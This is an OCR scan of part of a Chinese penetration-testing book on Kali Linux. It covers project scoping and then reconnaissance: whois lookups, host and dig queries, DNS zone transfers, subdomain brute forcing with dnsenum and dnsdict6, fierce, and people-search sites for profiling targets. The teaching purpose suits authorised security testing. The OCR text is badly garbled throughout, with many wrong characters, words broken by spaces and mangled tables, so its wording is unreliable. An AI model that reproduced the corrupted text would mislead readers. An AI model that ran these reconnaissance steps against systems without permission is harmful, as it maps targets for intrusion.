量 业 务 系统 的 保密 性 、 完 整 性 和 可 用 性 。 

e 帮助 客户 消除 所 有 尚未 被 对 手 恶 意 利用 的 潜在 风险 ， 避 免 潜 在 事 
故 可 能 造成 的 损失 ， 从 而 提高 了 投资 回报 率 CROD 。 

e 评估 人 员 问 客户 技术 团队 推荐 的 详细 的 安全 流程 ， 可 帮助 客户 消 
除 有 关 的 安全 隐患 ， 最 终 减少 客户 的 运营 负担 。 

e 根据 目标 信息 系统 所 采用 的 底层 技术 ， 以 业内 相应 的 最 佳 安全 实 
践 为 蓝本 ， 配 合 最 佳 组 合 的 工具 和 技术 ， 对 被 测 单位 的 信息 系统 进行 安 
全 评估 























e 推荐 所 有 可 用 于 保护 经 营 性 资产 的 安全 解 ; 
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要 管理 好 渗透 测 斌 项目， 就 要 彻 捕 了 解 范 围 界定 流程 中 的 各 个 部 
分 。 一 旦 明确 了 范围 目标 ， 项 目 主 管 就 可 以 与 渗透 测试 人 员 协 作 ， 共 同 
开发 一 个 拟定 好 项 目 计 划 和 时 间 进 度 的 正式 大 纲 。 虽 然 渗透 测试 人 员 通 
常 可 以 独立 完成 这 个 任务 ， 但 是 让 客户 参与 进来 更 好 ， 因 为 他 们 会 在 有 
天 的 日 程 安排 上 给 予 积 极 的 配合 。 项 目 管理 和 进度 安排 非常 重要 ， 因 为 
在 执行 测试 任务 时 必须 精确 保持 进度 ， 避 免 超 出 预定 的 时 间 。 在 渗透 测 
试 过 程 中 ， 一 旦 给 相关 任务 明确 指派 了 合适 的 资源 之 后 ， 就 更 有 必要 给 
与 之 有 关 的 关键 任务 拟定 进度 安排 。 

所 谓 “ 任 务 ”， 束 是 由 渗透 测试 人 完成 的 一 部 分 工作 。 而 “资源 ?可 以 
征 安全 评估 中 涉及 的 人 员 ， 也 可 以 是 在 测试 过 程 中 的 普通 资源 ， 例 如 实 
验 需 材 。 我 们 可 以 使 用 许多 现 有 的 项 目 管理 工具 ， 把 项 目 管理 得 高 效 而 
划算 。 下 文 列 出 了 一 些 项 目 管理 工具 。 您 可 根据 实际 环境 和 客户 需求 来 
选择 最 佳 的 工具 。 























项 目 管理 工具 官方 网 站 
Microsoft Office Project Professional http://www.microsoft.com/project/ 
TimeControl http: //www.timecontrol.com/ 
TaskMerlin http://www.taskmerlin.com/ 
Project Kick Start Pro http://www.projectkickstart.com/ 
FastTrack Schedule http://www.aecsoftware.com 
Serena OpenProj http://www.openproj.org/ 
TaskJuggler http://www. taskjuggler.org/ 


上 述 每 个 工具 的 功能 都 很 强大 。 应 用 这 些 工 具 ， 参 照 预定 任务 和 时 
间 规 划 ， 项 目 管 理 主管 可 以 轻松 地 人 退 踪 、 管 理 渗透 测试 人 员 的 工作 进 
度 。 此 外 ， 这 些 工 具 都 提供 了 非常 高 级 的 功能 。 例 如 ， 在 任务 完成 和 超 
过 期 限时 ， 这 些 工 具 可 以 给 项 目 主 管 发 送 警 报信 息 。 实 际 上 ， 在 渗透 测 








试 工 作 中 应 用 项 目 管理 工具 的 好 处 有 很 多 。 例 如 能 够 促进 入 们 按时 完成 
任务 ， 提 高 测试 生产 力 和 客户 满意 度 ， 改 善 工 作 的 质 和 量 ， 灵 活 地 控制 
工作 流程 等 。 








3.6 本 章 总 结 


本 章 介 绍 了 渗透 测试 工作 里 与 范围 界定 有 关 的 部 分 。 如 果 您 准备 局 
动 专业 的 渗透 测试 项 目 ， 束 应 当 充分 重视 这 部 分 工作 。 本 章 介绍 的 内 容 
主要 是 确定 测试 需求 方面 的 必要 规范 。 基 于 这 个 目的 ， 本 章 强 调 并 详细 
描述 了 范围 界定 流程 的 每 一 个 相关 步骤 。 这 些 步 又 构成 了 实施 测试 所 需 
的 过 程控 制 路 线 图 。 范 围 界 定 流程 由 5 个 独立 的 元 素 组 成 : 收集 需求 、 
筹划 工作 、 边 界 分 析 、 明 确 业 务 指标 、 项 目 管 理 和 统筹 调度 。 范 围 界 定 
流程 的 工作 ， 旨 在 于 获取 、 管 理 尽 可 能 多 的 与 目标 环境 有 关 的 信息 ， 这 
部 分 信息 在 整个 渗透 测试 的 过 程 里 都 将 起 到 举足轻重 的 作用 。 下 面 ， 我 
们 总 结 一 下 范围 界定 流程 工作 的 每 个 组 成 部 分 。 

e 收集 需求 : 从 客户 或 者 用 户 那 里 收集 什么 信息 才能 成 功 完成 渗透 
测试 任务 ?这 部 分 内 容 提 供 一 个 可 行 的 通用 准则 。 在 这 个 阶段 的 工作 应 
当 明 确 渗透 测试 的 类 型 、 基 础 设施 信息 、 组 织 结构 关系、 预算 概要 、 时 
间 分 配 和 交付 成 果 的 具体 类 型 。 

e 筹划 工作 : 这 个 阶段 的 工作 分 为 制定 严谨 的 测试 流程 、 解 决 人 员 
配置 、 成 本 分 析 、 保 密 协 议 、 渗 透 测 试 合同 以 及 操作 规则 的 问题 。 这 些 
工作 内 容 本 身 就 够 成 了 制定 正式 测试 计划 所 需 的 各 个 流程 。 最 终 制定 的 
测试 计划 应 能 准确 反映 客户 需求 ， 应 能 全 面 解决 测试 工作 会 涉及 的 法 律 
层面 和 业务 领域 的 各 种 问题 ， 应 能 合理 分 配 资源 ， 适 当 控 制 成 本 ， 并 明 
确 操作 规则 。 男 外 ， 本 半 还 有 一 个 测试 计划 检查 清单 的 样本 ， 它 会 有 助 
于 保证 测试 计划 的 完整 性 。 

e 边界 分 析 : 介绍 了 在 解读 客户 需求 时 ， 需 要 注意 何 种 的 局 限 条 件 

















和 测试 边界 。 它 们 主要 分 为 拉 术 上 的 限制 、 知 识 限 制 ， 或 者 客户 为 了 控 
制 渗 透 测 试 流程 而 提出 的 基础 设施 有 关 的 其 他 方面 的 限制 。 专 业 人 员 应 
能 根据 客户 的 需求 ， 准 确 清晰 地 判断 出 各 种 测试 边界 。 有 一 些 特定 的 流 
程 可 用 于 克服 这 些 问题 。 

e 明确 业务 指标 : 这 个 阶段 的 工作 主要 关注 渗透 测试 服务 能 够 给 客 
己 市 来 的 关键 效益 。 本 章 的 这 一 小 市 提供 了 一 系列 的 业务 指标 ， 这 些 指 
标 结合 了 评估 准则 和 评估 服务 的 专业 效果 。 

e 项 目 管理 和 统筹 调度 : 在 范围 界定 流程 里 ， 这 个 阶段 的 工作 至 关 
重要 。 当 收集 好 全 部 需求 ， 并 将 之 整理 为 测试 计划 的 有 关内 容 之 后 ， 就 
需要 为 每 项 任务 分 配 适 当 的 资源 和 时 间 。 我 们 可 以 通过 使 用 先进 的 项 目 
管理 工具 ， 坚 不 费力 地 跟 躁 这 些 任务 的 进度 状况 和 资源 状态 。 这 些 工 作 
有 助 于 提高 测试 的 生产 力 和 工作 效率 。 

下 一 章 将 介绍 在 渗透 测试 中 扮演 重要 角色 的 侦察 流程 。 它 包括 探测 
公共 资源 、DNS ”服务 器 、 搜 索引 擎 以 及 其 他 有 关 目 标 基 础 设施 的 逻辑 
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本 章 将 曾 述 信息 收集 的 概念 及 其 作用 ， 进 而 介绍 信息 收集 阶段 的 各 
项 渗透 测试 工作 。 此 外 ， 我 们 还 会 介绍 Kali Linux 收录 的 信息 收集 工 
具 。 和 希望 读者 在 阅读 本 章 之 后 能 够 理解 在 信息 收集 阶段 的 渗透 测试 工 
作 ， 并 且 能 够 在 实际 的 渗透 测试 中 顺利 收集 各 种 必要 信息 。 

前 面 章节 介绍 过 ， 渗 透 测 试 方法 论 的 第 二 个 阶段 是 信息 收集 阶段 。 
在 这 个 阶段 中 ， 要 尽 可 能 地 收集 与 测试 目标 有 关 的 各 类 信息 。 这 些 信息 
包括 DNS 信息 、 耳 地址、 采用 的 技术 以 及 基体 配置 、 用 户 名 的 组 织 单 
位 、 文 件 、 程 序 代码 、 密 码 重 置信 息 、 联 系 人 信息 等 。 信 息 收集 阶段 收 
集 到 的 每 一 条 信息 都 至 关 重 要 。 

言 恩 收 集 的 方法 可 归 为 两 类 : 主动 式 信 息 收集 和 被 动 式 信息 收集 。 
主动 式 收集 方法 是 通过 直接 发 起 与 和 被 测 目标 网 络 之 间 的 互动 来 获取 相关 
Hi. Bü, ICMP ping 或 者 TCP 端口 扫描 就 属于 主动 式 信 息 收 集 手 
段 。 而 被 动 信息 收集 方法 ， 则 是 通过 第 三 方 服 务 来 获取 目标 网 络 的 相关 
言 轧 ， 例 如 使 用 谷歌 搜索 引擎 等 。 

这 两 种 收集 方式 并 没有 优 务 之 分 ， 每 种 方式 都 有 各 自 的 优点 。 如 果 
采用 和 被动式 扫描 ， 您 收集 到 的 信息 相对 较 少 ， 但 是 这 种 扫描 却 不 会 被 用 
现 。 然 而 ， 尽 管 主 动 扫 描 可 获取 的 信息 相对 多 一 些 ， 但 是 很 多 设备 可 能 
己 经 捕获 了 您 的 扫描 行为 。 在 渗透 测试 项 目 中 ， 可 能 需要 重复 进行 多 次 
扫描 才能 获取 足够 充分 的 信息 。 您 也 可 以 与 渗透 测试 的 顾客 进行 沟通 ， 
选取 他 们 需要 的 信息 收集 方式 。 

本 章 内 容 分 为 下 述 几 个 部 分 : 

e 通过 公开 网 站 收集 目标 域 的 有 关 信 息 ; 

e 收集 域 的 注册 信息 ; 
































e DNS 分 析 ; 
e 收集 路 由 信息 ; 
e 利用 搜索 引擎 。 


4.1 公开 网 站 


我 们 可 以 通过 茶 些 公开 网 站 来 收集 目标 域 的 有 关 信 息 。 通 过 公开 网 
站 收集 信息 的 好 人 处 在 于 不 必 向 目标 网 络 直接 发 送 数 据 ， 从 而 避免 使 目标 
察觉 我 们 的 行动 。 

您 可 以 使 用 下 述 网 站 : 


编号 网 址 描述 


1 http://www.archive.org 收录 了 部 分 网 站 的 历史 页 面 

2 http://www.domaintools.com/ 收录 了 各 种 域名 情报 

3 http://www.alexa.com/ 提供 网 站 信息 的 分 析 服 务 

4 http://serversniff.net/ 免费 的 “瑞士 军刀 ”， 可 监测 网 络 、 服 务 器 状态 和 路 由 信息 


多 种 免费 的 在 线 工 具 ， 提 供 DNS 工具 、 验 证 E-mail 地 址 ， 以 及 























5 http://centralops.net/ 在 线 pmg, “whois EEEE 服务 
6 http://www.robtex.com 可 用 于 搜索 域名 和 网 络 信息 
7 http://www.pipl.com/ 通过 姓名 、 城 市 、 州 〈 省 ) 和 国家 等 信息 来 查找 人 物 
8 http://yoname.com 该 网 站 通过 SNS 和 博客 查找 人 物 
. ; 免费 的 人 物 搜 索引 擎 ， 用 户 可 以 通过 姓名 、 电 话 号 码 、E-mail、 
a adio 网 站 、 照 片 等 信息 查找 人 物 
. 免费 的 人 物 搜 索引 擎 ， 用 户 可 以 通过 姓名 、 电 话 号 码 、E-mail 信 
10 http://www.isearch.com/ 息 查 找 人 物 
TinEye 是 图 像 的 反 向 搜索 引擎 。 我 们 可 以 使 用 TinEye 查找 图 片 
11 http://www.tineye.com 的 出 处 、 使 用 方式 、 是 否 存 在 其 他 版 本 ， 也 可 用 之 搜索 同一 图 片 
的 更 高 解析 度 的 版 本 
12 http://www.sec.gov/edgar. SEE) aR BH AHS 上 地 直上 "AN 
iron 可 在 〈 美 国 ) 证 券 交 易 委员 会 的 网 站 上 搜索 上 市 公司 的 公开 信息 








上 述 网 站 简单 易 用 ， 您 只 需 在 可 接 入 互联 网 的 设备 上 打开 浏览 器 就 
可 开始 收集 信息 。 我 们 建议 您 在 使 用 Kali Linux 里 的 工具 之 前 首先 使 用 
公开 网 站 获取 信息 。 

为 了 保护 真正 存在 的 网 域 ， 我 们 在 本 文 的 示例 里 更 换 了 真实 的 域 
名 。 下 文 用 到 了 很 多 的 域名 ， 例 如 IANA 的 保留 域名 examples.com。 这 
些 域名 仪 供 演 示 之 用 。 





lil 


4.2 ti di 


在 知道 目标 的 域名 之 后 ， 您 想 做 的 第 一 件 事 可 能 就 是 从 whois 数 据 
库 里 获取 域名 的 注册 信息 。whois 数 据 库 记 录 有 该 域名 的 DNS 服务 器 信 
息 和 注册 人 的 联系 信息 。 

WHOIS 是 一 个 标准 的 互联 网 协议 ， 可 用 于 收集 网 络 注册 、 注 册 域 
名 、IP 地 址 和 自治 系统 的 信息 。RFC 3912 ”明确 了 这 一 规则 的 有 关 规 
范 ， 有 兴趣 的 读者 可 参见 https://www. ietf.org/rfc/rfc3912.txt。 





默认 安装 的 Kali Linux 带 有 whois 客户 端 程 序 。 如 需 查 询 某 一 域名 
的 whois 信息 ， 可 在 终端 中 使 用 下 述 whois 指 令 
# whois example.com 
然后 ， 该 指令 会 显示 这 个 域名 的 whois 信 息 : 


Whois Server Version 2.0 





Domain names in the .com and .net domains can now be registered 
with many different competing registrars. Go to http://www.internic.net 
for detailed information. 
Domain Name: EXAMPLE.COM 
Registrar: REGISTRAR.COM 
Whois Server: whois.registrar.com 
Referral URL: http://registrar.com 
Name Server: NS.HOSTING.COM 
Name Server: NS2.HOSTING.COM 
Status: clientDeleteProhibited 
Status: clientRenewProhibited 
Status: clientTransferProhibited 
Status: clientUpdateProhibited 
Updated Date: 08-apr-2012 
Creation Date: 08-apr-2012 
Expiration Date: 08-apr-2015 
>>> Last update of whois database: Wed, 25 Jul 2012 02:15:41 UTC 
<<< 
Please note: the registrant of the domain name is specified 
in the "registrant" field. In most cases, registrar.com 
is not the registrant of domain names listed in this database. 


The Registrant: 


Jalan Sudirman No. 1 
DKI Jakarta 
Indonesia 12345 
Domain Name: EXAMPLE.COM 
Created on: 08-Apr-12 
Expires on: 08-Apr-15 
Last Updated on: 08-Apr-12 
Administrative Contact: 
The Registrant 
Jalan Sudirman No. 1 
DKI Jakarta 
Indonesia 12345 
62 2112345678 
Technical Contact: 
The Registrant registrant@example.com 
Jalan Sudirman No. 1 
DKI Jakarta 
Indonesia 12345 
62 2112345678 
Domain servers in listed order: 
NS.HOSTING.COM 
NS2.HOSTING.COM 
我 们 可 以 在 上 述 whois 返回 结果 中 获取 DNS 服务 器 的 信息 以 及 域 
名 注册 人 的 联系 信息 。 这 些 信息 会 在 渗透 测试 的 后 续 阶段 发 挥 作用 。 
除了 通过 命令 行 的 whois 客 户 病 程序 ， 我 们 还 可 以 使 用 下 述 网 站 获 
取 whois 信 息 ， 这 些 网 站 同样 通过 whois 客 户 端 程序 查询 有 关 信 息 。 


e www.whois.net 








e www .internic.net/whois.html 
此 外 ， 您 也 可 以 访问 顶级 域名 注册 商 ， 碍 询 相 应 域名 的 信息 。 


e 美洲 : www.arin.net/whois/ 








e 欧洲 : www.db.ripe.net/whois 

e 亚太 : www.apnic.net/apnic-info/whois_search2 

顶级 域名 注册 商 的 系统 ， 只 提供 在 他 们 那里 注册 的 域名 的 ”whois 信 
轧 。 例 如 ARIN 提供 的 whois 服务 只 能 在 它 自 己 的 数据 库 里 查找 whois 
信息 ， 而 不 会 搜索 RIPE 和 APNIC 的 数据 库 。 


4.3 DNS 记 录 分 析 


使 用 DNS 分 析 工 具 可 收集 DNS 服 务 器 信息 和 有 关 域 名 的 相应 记录 。 
DNS 记 录 分 为 下 述 几 种 类 型 。 














编号 类 型 描述 
1 SOA 授权 管理 该 域 的 服务 器 
2 NS 名 称 解 析 服 务 器 
3 入 IPv4 地 址 
4 MX 邮件 服务 器 地 址 
5 PTR 逆向 解析 记录 
6 AAAA IPv6 地 址 
7 CNAME 别名 记录 /Canonical name 

例如 ， 在 某 次 渗透 测试 的 过 程 之 中 ， 客 户 要 您 查找 他 们 域名 下 的 所 





有 主机 和 IP 地 址 。 此 时 您 只 有 域名 信息 。 我 们 能 够 通过 几 个 工具 回答 客 
户 的 询问 。 
4.3.1 host 
在 得 到 DNS 服 务 器 信息 之 后 ， 下 一 步 工作 就 是 找 出 主机 名 称 的 IP 地 
址 。 这 种 情况 下 ， 我 们 可 以 使 用 host 指 令 向 DNS 服 务 器 查询 主机 的 IP 地 
Deg 


# host www.example.com 


该 指令 的 返回 结果 如 下 。 

www.example.com has address 192.0.43.10 

www.example.com has IPv6 address 2001:500:88:200::10 

我 们 可 以 从 中 找到 主机 www.example.com 的 IPv4 地 址 和 IPv6 地 址 。 

默认 情况 下 ，host 指 令 会 搜索 域名 的 A 记录 、AAAA 记 录 和 MXi 记 
录 。 如 需 查 询 全 部 DNS 记 录 ， 可 以 使 用 选项 -a。 

# host -a example.com 

Trying "example.com" 

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 25153 

; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, 
ADDITIONAL: 2 

3; QUESTION SECTION: 


;example.com. IN ANY 

;; ANSWER SECTION: 

example.com. 3201 IN SOA dns1.icann.org. 
hostmaster.icann.org. 2012080782 7200 3600 1209600 3600 
example.com. 46840 IN NS a.iana-servers.net. 
example.com. 46840 IN NS b.iana-servers.net. 


; ADDITIONAL SECTION: 

b.iana-servers.net. 1401 IN A 199.43.133.53 

a.iana-servers.net. 1401 IN A 199.43.133.53 

Received 170 bytes from 202.152.165.39#53 in 563 ms 

host 指 令 和 查询 域名 信息 的 DNS 服务 器 ， 就 是 文件 /etcresolv.conf 指 定 
的 DNS 服务 器 。 如 果 想 查询 其 他 的 DNS 服务 器 ， 可 在 指令 的 尾部 直接 添 
加 DNS 服务 器 地 址 。 

通过 查询 域名 的 IP 信 息 ， 这 种 伍 询 叫做 正 同 查询 (forward 
lookup〉。 而 通过 IP 地址 查询 域名 ， 这 种 查询 叫做 逆 问 查询 (reverse 





lookup) . 

使 用 下 述 指令 进行 逆 同 查询 ， 将 会 得 到 什么 信息 ? 

host 23.23.144.81 

host 程序 还 可 以 进行 DNS 域 传 输 (zone transfer) 。 域 传输 的 结果 
包含 某 一 域 里 所 有 的 主机 名 称 。 

DNS 服 务 器 的 域 传输 机 制 用 于 在 主 控 Cmaster) DNS 服 务 器 和 其 他 
服务 器 (通常 是 从 属 DNS 服 务 器 /slave) 进行 DNS 数 据 库 同步 。 若 没有 
这 种 机 制 ， 管 理 员 束 得 分 别 更 新 每 台 DNS 服 务 器 的 数据 库 。DNS 服务 
器 应 当 只 和 同一 域 里 的 经 过 映 份 验证 的 服务 器 进行 域 传输 。 

因为 DNS 域 传输 功能 可 能 外 泄 整个 域 的 所 有 信息 ， 所 以 人 们 大 多 都 
对 这 个 功能 进行 了 限制 。 当 今 ， 提 供 公 开 的 域 传输 的 DNS 服务 器 已 经 很 








少见 了 。 
WRES DNS 服务 器 会 与 任意 主机 进行 域 传输 ， 就 说 明 这 人 台 DNS 
服务 器 的 配置 不 正确 。 


如 果 有 东台 DNS 服务 器 可 以 进行 域 传输 ， 我 们 就 可 使 用 下 面 这 类 指 
4. 

# host -| example.com ns4.isp.com 

DNS 域 传输 的 结果 如 下 。 

Using domain Server: 

Name: ns4.isp.com 

Address: 172.16.176.22#53 

Aliases: 

example.com name server ns1.isp.com. 

example.com name server ns2.isp.com. 

example.com has address 192.168.1.1 

smtp.example.com has address 192.168.1.2 


mail.example.com has address 192.168.1.3 


webmail.example.com has address 192.168.1.3 

www.example.com has address 192.168.1.4 

在 进行 域 传输 时 ，host 指 令 将 会 返回 该 域 的 NS 记录 、PTR 记 录 和 地 
址 记录 。 本 例 所 使 用 的 配置 不 当 的 DNS 服务 器 是 ns4.isp.com。 


4.3.2 dig 


除了 host 指 令 之 外 ， 您 还 可 以 使 用 dig 指 令 进行 DNS 查询 。 相 比 host 
指令 而 言 ， dig 指 令 的 用 法 更 为 灵活 ， 输 出 更 为 清晰 。 您 甚至 可 以 使 用 
dig 指 令 处 理 一 个 文件 里 所 有 的 DNS 碍 询 指令 。 

我 们 可 使 用 dig 命 令 查 询 example.com 〈 见 图 4.1) 。 


rootükali:-£ dig example.com 





; <<>> DiG 9.8.4-rpz2«r1005.12-P1 <<>> example.com 
;; global options: «cmd 
;; Got answer: 
; -»»HEADER««- opcode: QUERY, status: NOERROR, id: 3786 
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: ©, ADDITIONAL: 0 


;; QUESTION SECTION: 
;example.com. IN A 


:; ANSWER SECTION: 
example.com. 41023 IN A 192.0.43.10 


;; Query time: 14 msec 

;; SERVER: 10.17.3.245#53(10.17.3.245) 
;; WHEN: Mon May 20 08:53:09 2013 

;; MSG SIZE rcvd: 45 








图 4.1 
如 果 在 使 用 它 的 时 候 不 指定 任何 选项 ，dig 指 令 仅 会 返回 该 域 的 A 记 
录 。 如 需 碍 询 全 部 类 型 的 DNS 数据 ， 我 们 可 把 type 选 项 设 定 为 any。 
# dig example.com any 
; <<>> DiG 9.7.0-P1 <<>> example.com any 


;; global options: +cmd 


;; Got answer: 

3; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 40971 

; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, 
ADDITIONAL: 2 

; QUESTION SECTION: 


;example.com. IN ANY 

;; ANSWER SECTION: 

example.com. 3565 IN SOA dns1.icann.org. 
hostmaster.icann.org. 2012080782 7200 3600 1209600 3600 
example.com. 83186 IN AAAA  2001:500:88:200::10 
example.com. 48296 IN NS b.iana-servers.net. 
example.com. 48296 IN NS a.iana-servers.net. 


; ADDITIONAL SECTION: 

a.ana-servers.net. 182 IN A 199.43.132.53 

b.iana-servers.net. 182 IN A 199.43.133.53 

;; Query time: 327 msec 

3; SERVER: 202.152.165.39#53(202.152.165.39) 

; WHEN: Sat Aug 18 10:46:09 2012 

3; MSG SIZE rcvd: 198 

这 条 指令 返回 了 该 域名 的 SOA 记 录 、NS 记 录 、A 记 录 和 AAAA 记 
Ko 

在 使 用 dig 指 令 进行 域 传 输 时 ， 我 们 必须 设置 DNS 服务 器 为 权威 
DNS， 并 且 设 置 传输 类 型 为 axfr。 

# dig @ns4.isp.com example.com axfr 

该 指令 的 返回 结果 如 下 。 

; <<>> DiG 9.7.0-P1 <<>> @ns4.isp.com example.com axfr 


; (1 server found) 


;; global options: +cmd 


example.com. 3600 IN SOA ns1.isp.com. hostmaster. 
isp.com. 2011020409 900 600 86400 3600 

example.com. 3600 IN NS ns1.isp.com 
example.com. 3600 IN NS ns4.isp.com 
example.com. 3600 IN A 192.168.1.1 
example.com. 3600 IN MX 192.168.1.3 


mail.example.com. 3600 IN A 192.168.1.3 

webmail.example.com. 3600 IN A 192.168.1.3 

www.example.com. 3600 IN A 192.168.1.4 

example.com. 3600 IN SOA nsl.isp.com hostmaster. 

isp.com 2011020409 900 600 86400 3600 

;; Query time: 855 msec 

5 SERVER: 172.16.176.22#53 (172.16.176.22) 

; WHEN: Sat Aug 18 10:59:11 2012 

5 XFR size: 9 records 

这 个 指令 的 返回 结 末 和 host 的 返回 结果 十 分 相似 。 如 果 看 到 这 种 类 
型 的 返回 结果 ， 就 说 明 我 们 收集 到 了 所 有 DNS 记 录 。 


4.3.3 dnsenum 


另外 ， 我 们 可 利用 dnsenum 程 序 收集 DNS 数据 。 这 个 程序 能 
的 DNS 信息 分 为 下 述 几 类 : 

e 主机 IP 地 址 ; 

e 该 域 的 DNS 服务 器 ; 

e 该 域 的 MX 记录 。 

在 这 一 章 里 ， 您 会 发 现 不 同 程序 的 返回 结果 十 分 相似 。 这 是 因为 我 
们 惑 是 在 通过 不 同 的 程序 验证 相同 的 数据 。 返 回 同一 信息 的 程序 越 多 ， 


IT 


够 收集 











我 们 对 这 一 信息 就 越 有 信心 。 
除了 获取 DNS 信息 的 功能 之 外 ，dnsenum 还 有 下 述 几 个 特性 。 
e 它 能 够 通过 谷歌 搜索 其 他 的 域名 和 子 域名 。 

e 可 使 用 字典 文件 对 子 域名 进行 暴力 破解 。Kali Linux ”收录 的 
dnsenum 自 带 有 字典 文件 (dns.txt) ， 该 字典 可 测试 1480 个 子 域名 。 此 
外 为 有 可 测试 266930 个 子 域名 的 字典 文件 dns-big.txt。 

e 可 对 C 类 网 段 进 行 whois 查询 并 计算 其 网 络 范围 。 

e 可 对 网 段 进行 反问 查询 。 

e 采用 多 线程 技术 ， 可 进行 并 发 查询 。 

如 需 局 动 dnsemu， 可 在 终端 中 使 用 下 述 指令 

# dnsenum 

而 后 ， 程 序 会 在 屏幕 上 显示 它 的 指令 介绍 

为 了 演示 dnsenum 的 用 法 ， 我 们 将 用 它 来 收集 目标 域 的 DNS 信息 。 

# dnsenum example.com 

该 指令 的 返回 结果 如 下 。 

dnsenum.pl example.com 

dnsenum.pl VERSION:1.2.2 


----- example.com ---- 











Host's addresses: 

Name Servers: 

ns1.isp.com 10771 IN A 172.168.1.2 
nsO.isp.com 7141 IN A 172.168.1.1 


Mail (MX) Servers: 


hermes1.example.com 864000 IN A 192.168.10.3 


hermes.example.com 3600 IN A 192.168.10.2 


Trying Zone Transfers and getting Bind Versions: 


Trying Zone Transfer for example.com on ns0.isp.com ... 
AXFR record query failed: NOERROR 


ns0.isp.com Bind Version: 


DNS server 

Trying Zone Transfer for example.com on ns1.isp.com ... 
example.com 86400 IN SOA 
example.com 86400 IN NS 
example.com 86400 IN MX 
example.com 86400 IN TXT 
admin.example.com 3600 IN NS 
blogs.example.com 3600 IN NS 
ftp.example.com 3600 IN A 192.168.10.4 
hermes.example.com 3600 IN A 192.168.10.2 
hermes.example.com 86400 IN TXT 
hermes.example.com 86400 IN SPF 
hermes1.example.com 86400 IN A 192.168.10.2 
www.example.com 3600 IN NS 


ns1.isp.com Bind Version: 

DNS server 

brute force file not specified, bay. 

默认 情况 下 ，dnsenum 会 返回 主机 地 址 、 名 称 解析 服务 器 和 邮件 服 
务 器 的 IP 地 址 信息 。 好 在 nsl.isp.com 这 台 DNS 服 务 器 允许 我 们 对 
example.com 进 行 域 传 输 。 

在 不 能 进行 域 传输 的 情况 下 ， 我 们 可 以 使 用 字典 文件 对 子 域名 进行 








暴力 破解 。 例 如 ， 如 果 使 用 字典 文件 dns.txt 暴 力 破解 example.com 的 子 域 
名 ， 可 使 用 下 述 指令 。 

dnsenum -f dns.txt example.com 

该 指令 的 返回 结果 如 下 。 


Brute forcing with dns.txt: 


apps.example.com 86400 IN A 192.168.10.152 

mail.example.com 86400 IN A 192.168.10.107 

portal.example.com 86400 IN A 192.168.10.249 

请 注意 ，DNS 域 名 暴力 破解 的 耗 时 较 长 。 

征 运 的 是 ， 目 标 域 使 用 了 第 见 域名 。 我 们 使 用 字典 文件 进行 暴力 破 
解 ， 发 现 了 多 个 子 域名 〈apps、mail 和 portal) 。 

我 们 还 可 以 通过 Google 搜索 某 域 的 子 域名 。 在 DNS AREH 
的 情况 下 ， 这 种 方法 十 分 有 效 。 在 dnsenum 指 令 里 加 上 “-p 页 数 ” 选 项 ， 
可 在 Google 结 果 的 前 儿 页 里 搜索 子 域名 。 而 在 指令 的 里 加 上 “-s 数量 ”， 
则 可 按 个 数 搜索 子 域名 。 为 了 加 速 搜索 进程 ， 可 以 设置 线程 的 数量 〈-- 
threads) 。 











4.3.4 dnsdict6 


前 文 介绍 了 几 个 枚 举 IPv4 子 域名 的 DNS 工具 。 如 果 您 需要 枚 举 IPv6 
的 子 域名 ， 就 需要 使 用 The Hacker’s Choice (THC) 小 组 推出 的 
dnsdict6. 

为 了 访问 Kali Linux 中 的 dnsdict6， 可 以 在 终端 中 输入 下 述 命令 。 

# dnsdict6 

这 将 显示 dsndict6 帮 助 页 面 。 

如 有 果 没 有 任何 选项 ，dsndict6 将 使 用 内 置 的 字典 文件 和 8 个 线程 。 

枚 举 example.com 各 子 域名 的 指令 如 下 。 


# dnsdict6 example.com 
该 指令 的 返回 结果 如 图 4.2 所 示 。 


root@kali:~# dnsdict6 example.com 

Starting DNS enumeration work on example.com. 

Starting enumerating example.com. - creating 8 threads for 798 words... 
Estimated time to completion: 1 to 2 minutes 

www.example.com. => 2001:500:88:200: :10 





Found 1 domain name and 1 unique ipv6 address for example.com. 


图 4.2 
dnsdict6 自 带 的 字典 文件 可 测试 798 个 子 域 名 。 在 使 用 dnsdict6 暴 力 
破解 子 域名 之 后 ， 我 们 可 以 看 到 它 测试 出 了 example.com 的 1 个 IPv6 的 子 
域名 (www) 。 
我 们 发 现 dnsdict6 显 示 的 字典 单词 的 数量 不 对 。 在 我 们 给 它 指定 了 
一 个 含有 3 个 条 目的 字典 文件 之 后 ，dnsdict6 程序 却 显示 字典 里 含有 4 个 





条 目 。 

在 指定 选项 -4 之 后 ，dnsdict6 就 可 以 测试 IP v4 的 子 域名 。 还 可 通过 - 
d 选项 ， 让 它 收 集 该 域 的 DNS 和 NS 信息 。 现 在 ， 我 们 演示 一 下 这 两 个 选 
项 的 作用 〈 见 图 4.3) 。 


root@kali:~# dnsdict6 -d -4 example.com 

Starting DNS enumeration work on example.com. 

Gathering NS and MX information... 

NS of example.com. is b.iana-servers.net. => 199.43.133.53 
NS of example.com. is b.iana-servers.net. => 2001:500:8d::53 
NS of example.com. is a.iana-servers.net. => 199.43.132.53 
NS of example.com. is a.iana-servers.net. => 2001:500:8c::53 
Warning: no mail sever (MX) information found 








Starting enumerating example.com. - creating 8 threads for 798 words... 
Estimated time to completion: 1 to 2 minutes 

Warning: wildcard domain configured 

*.example.com. -> 124.81.172.106 

Warning: wildcard domain configured (2nd test) 

Www.example.com. => 192.0.43.10 

Www.example.com. => 2001:500:88:200::10 


Found 1 domain name, 2 unique ipv4 and 1 unique ipv6 addresses for example.com. 








图 4.3 


4.3.5 fierce 


DNS 枚 举 工 具 fierce 可 通过 多 项 技术 查找 目标 的 耳 地 址 和 主机 名 。 邱 
会 通过 您 计算 机 使 用 的 DNS 服务 器 碍 找 继而 使 用 目标 域 的 DNS 服务 
妖 。 它 同样 可 以 利用 其 力 破 解 子 域名 。 在 使 用 字典 文件 进行 暴力 破解 
时 ， 它 会 调用 目标 域 的 DNS 服务 器 逐条 尝试 字典 里 的 DNS 条 目 。 这 个 
工具 的 主要 特点 是 ， 它 能 够 针对 不 连续 的 人 P 空 间 和 主机 名 称 进行 测试 。 

在 Kali Linux 里 的 终端 窗口 里 使 用 下 述 命令 可 查看 fierce 的 帮助 文 
f. 

# fierce -h 

